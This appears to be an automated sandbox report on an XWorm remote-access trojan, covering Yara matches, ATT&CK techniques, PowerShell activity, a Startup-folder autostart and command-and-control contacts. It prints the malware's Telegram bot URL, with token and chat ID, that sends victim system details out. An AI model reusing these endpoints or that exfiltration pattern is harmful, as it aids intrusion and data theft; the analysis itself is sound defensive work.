                                    Source: Yara matchFile source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000000.1332506285.0000000000E42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2615632586.0000000013191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2609307176.0000000003191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: 2QaN4hOyJs.exe PID: 7544, type: MEMORYSTR
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\System, type: DROPPED

Remote Access Functionality

                                    Source: Yara matchFile source: 2QaN4hOyJs.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.2.2QaN4hOyJs.exe.131a1a78.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.2QaN4hOyJs.exe.e40000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000000.1332506285.0000000000E42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2615632586.0000000013191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: 2QaN4hOyJs.exe PID: 7544, type: MEMORYSTR
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\System, type: DROPPED
                                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                    Source: Yara matchFile source: 2QaN4hOyJs.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.2.2QaN4hOyJs.exe.131a1a78.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.2QaN4hOyJs.exe.e40000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000000.1332506285.0000000000E42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2615632586.0000000013191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2609307176.0000000003191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: 2QaN4hOyJs.exe PID: 7544, type: MEMORYSTR
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\System, type: DROPPED
MITRE ATT&CK matrix (digits preceding a technique name are the report's per-technique signature counters, reproduced as extracted):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 Input Capture | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 2 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 PowerShell | 2 Registry Run Keys / Startup Folder | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 23 System Information Discovery | Remote Desktop Protocol | 1 Input Capture | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 2 Registry Run Keys / Startup Folder | 11 Obfuscated Files or Information | Security Account Manager | 521 Security Software Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Software Packing | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 151 Virtualization/Sandbox Evasion | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 Masquerading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 151 Virtualization/Sandbox Evasion | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior Graph ID: 1579078; Sample: 2QaN4hOyJs.exe; Startdate: 20/12/2024; Architecture: WINDOWS; Score: 100

Process tree: 2QaN4hOyJs.exe started, then started four powershell.exe instances, each of which started a conhost.exe.

Network nodes:
- pastebin.com, 104.20.3.235, port 443 (local port 49849), CLOUDFLARENETUS, United States: Connects to a pastebin service (likely for C&C)
- api.telegram.org, 149.154.167.220, port 443 (local port 49854), TELEGRAMRU, United Kingdom: Uses the Telegram API (likely for C&C communication)
- ip-api.com, 208.95.112.1, port 80 (local port 49717), TUT-ASUS, United States
- 2 other IPs or domains

Dropped file: C:\Users\user\AppData\Local\Temp\System, PE32

Signatures on the graph: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 21 other signatures on the sample node; on 2QaN4hOyJs.exe: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines), Protects its processes via BreakOnTermination flag, Bypasses PowerShell execution policy, 3 other signatures; on powershell.exe: Loading BitLocker PowerShell Module

Source | Detection | Scanner | Label | Link
2QaN4hOyJs.exe | 82% | ReversingLabs | Win32.Exploit.Xworm |
2QaN4hOyJs.exe | 100% | Avira | TR/Spy.Gen |
2QaN4hOyJs.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\System | 100% | Avira | TR/Spy.Gen |
C:\Users\user\AppData\Local\Temp\System | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\System | 82% | ReversingLabs | Win32.Exploit.Xworm |

No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip-api.com | 208.95.112.1 | true | false | | high
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
pastebin.com | 104.20.3.235 | true | false | | high
Brian123121-27796.portmap.io | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://pastebin.com/raw/4X62dQQ8 | false | | high
https://api.telegram.org/bot7803481908:AAFRJ7hGTHr7dVyXQ9pw_CE-Cb3xegvn5GY/sendMessage?chat_id=7705511583&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A4AB9DA9F1C2993F263A7%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%205BNYU1CK1%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20System | false | | high
http://ip-api.com/line/?fields=hosting | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.1444776853.000001D0E9413000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1541139414.000001FE90071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1688930369.0000024B11E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1897793175.000002B85943F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.microsoft.coL | powershell.exe, 0000000C.00000002.1926579498.000002B861950000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://api.telegram.org | 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000031E5000.00000004.00000800.00020000.00000000.sdmp, 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000032F3000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000C.00000002.1749492111.000002B8495F9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | 2QaN4hOyJs.exe, System.0.dr | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.1422516094.000001D0D95C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1474073745.000001FE80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1605210010.0000024B01FE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1749492111.000002B8495F9000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000C.00000002.1749492111.000002B8495F9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot7803481908:AAFRJ7hGTHr7dVyXQ9pw_CE-Cb3xegvn5GY/sendMessage?chat_id=77055 | 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000031E5000.00000004.00000800.00020000.00000000.sdmp, 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000032F3000.00000004.00000800.00020000.00000000.sdmp, 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000032F1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 0000000C.00000002.1897793175.000002B85943F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.mic | powershell.exe, 00000005.00000002.1556486342.000001FEF5663000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1925371278.000002B861924000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 0000000C.00000002.1897793175.000002B85943F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 0000000C.00000002.1749492111.000002B8495F9000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.m | powershell.exe, 00000005.00000002.1559162610.000001FEF5C34000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1923662075.000002B8618B6000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.microsoft.coi | powershell.exe, 00000005.00000002.1559162610.000001FEF5CC9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.1422516094.000001D0D95C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1474073745.000001FE80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1605210010.0000024B01FE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1749492111.000002B8495F9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 0000000C.00000002.1897793175.000002B85943F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.1444776853.000001D0E9413000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1541139414.000001FE90071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1688930369.0000024B11E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1897793175.000002B85943F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microsm | powershell.exe, 0000000C.00000002.1925371278.000002B861924000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://api.telegrP | 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000032F3000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.micft.cMicRosof | powershell.exe, 00000005.00000002.1556486342.000001FEF5663000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1925371278.000002B861924000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.1422516094.000001D0D93A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1474073745.000001FE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1605210010.0000024B01DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1749492111.000002B8493D1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://api.telegram.org | 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000032F3000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 2QaN4hOyJs.exe, 00000000.00000002.2609307176.0000000003191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1422516094.000001D0D93A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1474073745.000001FE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1605210010.0000024B01DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1749492111.000002B8493D1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.microsoft.coFA | powershell.exe, 0000000C.00000002.1923414066.000002B861888000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.20.3.235 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | false
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579078
Start date and time: 2024-12-20 19:13:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 36s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 2QaN4hOyJs.exe (renamed because the original name is a hash value)
Original Sample Name: 712ab1b048b49449d00e124e577e7eabe732252e0ba9ce3cead7eaf46f44903e.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@13/19@13/3
EGA Information:
• Successful, ratio: 20%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 51
• Number of non-executed functions: 9
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197, 23.206.229.209
• Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 2976 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7404 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7724 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7988 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtCreateKey calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtReadVirtualMemory calls found
• VT rate limit hit for: 2QaN4hOyJs.exe
Time | Type | Description
13:14:04 | API Interceptor | 57x Sleep call for process: powershell.exe modified
13:15:00 | API Interceptor | 41960x Sleep call for process: 2QaN4hOyJs.exe modified
13:15:00 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.20.3.235 | cr_asm3.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | gabe.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | cr_asm.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | cr_asm_atCAD.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | vF20HtY4a4.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | OSLdZanXNc.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | 5UIy3bo46y.dll | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | Lm9IJ4r9oO.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | BeginSync lnk.lnk | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | sostener.vbs | malicious | Njrat | pastebin.com/raw/V9y5Q5vv
208.95.112.1 | fvbhdyuJYi.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | 8DiSW8IPEF.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | twE44mm07j.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | YgJ5inWPQO.exe | malicious | AsyncRAT, XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | KJhsNv2RcI.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | gs7lQa4EuM.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | doc00290320092.jse | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | DHL_231437894819.bat.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | dlhost.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | WdlA0C4PkO.exe | malicious | Go Stealer, Skuld Stealer | ip-api.com/json
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | fvbhdyuJYi.exe | malicious | XWorm | 208.95.112.1
ip-api.com | 8DiSW8IPEF.exe | malicious | XWorm | 208.95.112.1
ip-api.com | twE44mm07j.exe | malicious | XWorm | 208.95.112.1
ip-api.com | YgJ5inWPQO.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
ip-api.com | KJhsNv2RcI.exe | malicious | XWorm | 208.95.112.1
ip-api.com | gs7lQa4EuM.exe | malicious | XWorm | 208.95.112.1
ip-api.com | doc00290320092.jse | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
ip-api.com | DHL_231437894819.bat.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | dlhost.exe | malicious | XWorm | 208.95.112.1
ip-api.com | WdlA0C4PkO.exe | malicious | Go Stealer, Skuld Stealer | 208.95.112.1
pastebin.com | bad.txt | malicious | AsyncRAT | 104.20.3.235
pastebin.com | dlhost.exe | malicious | XWorm | 104.20.4.235
pastebin.com | htkeUc1zJ0.exe | malicious | Unknown | 104.20.4.235
pastebin.com | c2.exe | malicious | Xmrig | 104.20.4.235
pastebin.com | Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk | malicious | Unknown | 172.67.19.24
pastebin.com | RdLfpZY5A9.exe | malicious | 77Rootkit, XWorm | 104.20.4.235
pastebin.com | file.exe | malicious | XWorm | 172.67.19.24
pastebin.com | main.exe | malicious | Unknown | 104.20.4.235
pastebin.com | CVmkXJ7e0a.exe | malicious | SheetRat | 104.20.4.235
pastebin.com | http://annavirgili.com | malicious | CAPTCHA Scam ClickFix | 172.67.19.24
s-part-0035.t-0009.t-msedge.net | WwVs3PavPg.exe | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | Tsy9P2T9yF.exe | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | http://www.eventcreate.com/e/you-have-received-a-new-doc | malicious | HTMLPhisher | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | gTU8ed4669.exe | malicious | Credential Flusher | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | zSmMqGGeVy.exe | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | 2M43DSi2cx.exe | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | VajVW1leCd.exe | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | 7JKssbjRDa.exe | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | m21jm5y5Z5.exe | malicious | LummaC | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | 16ebsersuX.exe | malicious | Cryptbot | 13.107.246.63
api.telegram.org | Invoice DHL - AWB 2024 E4001 - 0000731.exe | malicious | Snake Keylogger | 149.154.167.220
api.telegram.org | c9toH15OT0.exe | malicious | Unknown |
                                                                                                    • 149.154.167.220
                                                                                                    9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 149.154.167.220
                                                                                                    9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 149.154.167.220
                                                                                                    PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    • 149.154.167.220
                                                                                                    PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    • 149.154.167.220
                                                                                                    66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                    • 149.154.167.220
Associated Sample Name / URL | Detection | Threat Name | Context (rows grouped by Match)
Match: TELEGRAMRU
• https://l.facebook.com/l.php?u=https%3A%2F%2Ft.me%2FPAWSOG_bot%2FPAWS%3Fstartapp%3Dy6XarDUx%26fbclid%3DIwZXh0bgNhZW0CMTAAAR3IsDSVMcBgD-KKIyBXkOWfUkEFRcacr_vOCRRmviPmkFBUb89K461Xors_aem_phLdcKrpf4KWQzIltAO6sg&h=AT0WVJB1xqSKqrvz6oCyiCr2S_kisddMHHYmkei4Ws2sbL4pRphOmNE4PXT0dksI9PktkcW4m87_ll8cIS3t1M10038szd68S2XeJYojq6dQAb2PNvHsZFU9AcnVKku-Ww&__tn__=R%5D-R&c%5B0%5D=AT333mRdaoK-Yj4Ygf4lXueSR8jJ8CACMU4jPPhyx4Dd8BU65ez-7IWN-rjEtxmQ4vnelW50DVCFSTPJgFIJWEEx8TitUX4wIVY-t-NciHl77nL94VWL9IfsUrTxvCQB2zyPBhLoYnhspB5Xwyppb4fz5drOP91P-bJPoqSIEG9eoaQFOXaOYJeNVBj8A6jTCbgB-MXs3Mr2iqYLeO7DnF-q9v0FShLlwJK2Dtzfkv1OxBm45LKEAXAPoI199zlXmZpVMznj | malicious | Unknown | 149.154.167.99
• Invoice DHL - AWB 2024 E4001 - 0000731.exe | malicious | Snake Keylogger | 149.154.167.220
• ktyihkdfesf.exe | malicious | Vidar | 149.154.167.99
• pjthjsdjgjrtavv.exe | malicious | Vidar | 149.154.167.99
• c9toH15OT0.exe | malicious | Unknown | 149.154.167.220
• file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar | 149.154.167.99
• 9KEZfGRjyK.exe | malicious | Unknown | 149.154.167.220
• 9KEZfGRjyK.exe | malicious | Unknown | 149.154.167.220
• file.exe | malicious | NetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog Stealer | 149.154.167.220
• file.exe | malicious | ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar | 149.154.167.99
Match: CLOUDFLARENETUS
• https://tekascend.com/Ray-verify.html | malicious | NetSupport RAT | 1.1.1.1
• YgJ5inWPQO.exe | malicious | AsyncRAT, XWorm | 104.20.22.46
• http://url4659.orders.vanillagift.com/ls/click?upn=u001.4gSefN7qGt7uZc-2BljvSfDuK9c6f7zz-2BRDdNLkOmxp-2BfCpVRV4q5JSM05F18NmhW9aTh4D-2B-2FvKc3l62XSGdMxHErqjDyHVaRGnhWtdaxelWfxz8x2-2FY7A4qgb3tzDonO-2BR4v55hRVWLW8mGedQ4WKyhGmLG6TdN0VE3FuoaMfqbWnIJZADjzcMmwi0-2FbwmmeKkdfIhUk0sBHSi9RcRmdsfuOZwL5O2zEB6UFf08dp06kJXruK-2BF70HVCIIa3GSMCo48RLkzWG8dEOH-2FBZmckwy2IyrmhGk7TORgwM5bk4PbUxQPoYKq7IdXZDoj7BBWFZXgs6KkXD1kVfgQOsMLEKQeTvK5ATiMGw5YUv9FTPZiWgh4O-2B6hR3uc5gCam5ygOCJsmG3ya5dOP3AzZxmtrQO2ixrFnkLK-2Bkk5ChvTn26C-2BioOkvRUSczMMaDc3goe-2FffK-2FLybPlPtaG8BM0aogkRmbjy7uKwhjOW-2BFQyWewVzg-3DIgAR_79LTZgGyJjQA0yKF2CHqblXBaDJuc2sNW7Piu5vjvmdwcqDrB-2Buw9ZQukwHO-2BFDa1Pj-2BnPyP1wnuiUj8o1jeVFZ-2B0yTi1w6olXhC5xGcnSuX-2FPX8EC9nfY-2B3npShVzZ4Fae90bxak04TDiCsiP7PmtAOagYeRI4FU2qDP2MtD3eIC1vtRjmGkonGMDUW1rPFYKa2pBviC8swsnzOU26q7ssqOo-2FLjO6-2B2IyWprhTXXBsBk2HZWehLV3F8Prl0XOgIIe0Oi6f3V8mliLO9NN8Iw-3D-3D | malicious | Unknown | 104.19.230.21
• phish_alert_iocp_v1.10.16(15).eml | malicious | Unknown | 104.19.229.21
• https://lvxsystem.info/ | malicious | Unknown | 172.67.183.243
• Set-up.exe | malicious | LummaC Stealer | 104.21.84.113
• Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exe | malicious | MassLogger RAT | 172.67.177.134
• file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, SystemBC, zgRAT | 172.67.197.170
• Statement_3029_from_Cross_Traders_and_Logistics_ltd.exe | malicious | MassLogger RAT | 104.21.67.152
• Fortexternal.exe | malicious | Unknown | 172.67.75.163
Match: TUT-ASUS
• fvbhdyuJYi.exe | malicious | XWorm | 208.95.112.1
• 8DiSW8IPEF.exe | malicious | XWorm | 208.95.112.1
• twE44mm07j.exe | malicious | XWorm | 208.95.112.1
• YgJ5inWPQO.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
• KJhsNv2RcI.exe | malicious | XWorm | 208.95.112.1
• gs7lQa4EuM.exe | malicious | XWorm | 208.95.112.1
• doc00290320092.jse | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
• file.exe | malicious | NetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog Stealer | 208.95.112.1
• DHL_231437894819.bat.exe | malicious | AgentTesla | 208.95.112.1
• dlhost.exe | malicious | XWorm | 208.95.112.1
Associated Sample Name / URL | Detection | Threat Name | Context (rows grouped by Match)
Match: 3b5074b1b5d032e5620f69f9f700ff0e
• YgJ5inWPQO.exe | malicious | AsyncRAT, XWorm | 104.20.3.235, 149.154.167.220
• P0RN-vidz.Client.exe | malicious | ScreenConnect Tool | 104.20.3.235, 149.154.167.220
• 2AIgdyA1Cl.exe | malicious | Stealc, Vidar | 104.20.3.235, 149.154.167.220
• Sentinelled.vbs | malicious | Unknown | 104.20.3.235, 149.154.167.220
• mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta | malicious | Cobalt Strike | 104.20.3.235, 149.154.167.220
• QUOTATION#008792.exe | malicious | AgentTesla | 104.20.3.235, 149.154.167.220
• Invoice DHL - AWB 2024 E4001 - 0000731.exe | malicious | Snake Keylogger | 104.20.3.235, 149.154.167.220
• https://p.placed.com/api/v2/sync/impression?partner=barkley&plaid=0063o000014sWgoAAE&version=1.0&payload_campaign_identifier=71700000100870630&payload_timestamp=5943094174221506287&payload_type=impression&redirect=http%3A%2F%2Fgoogle.com%2Famp%2Fs%2Fgoal.com.co%2Fwp%2Fpayment | malicious | HTMLPhisher | 104.20.3.235, 149.154.167.220
• file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRAT | 104.20.3.235, 149.154.167.220
• ktyihkdfesf.exe | malicious | Vidar | 104.20.3.235, 149.154.167.220
No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
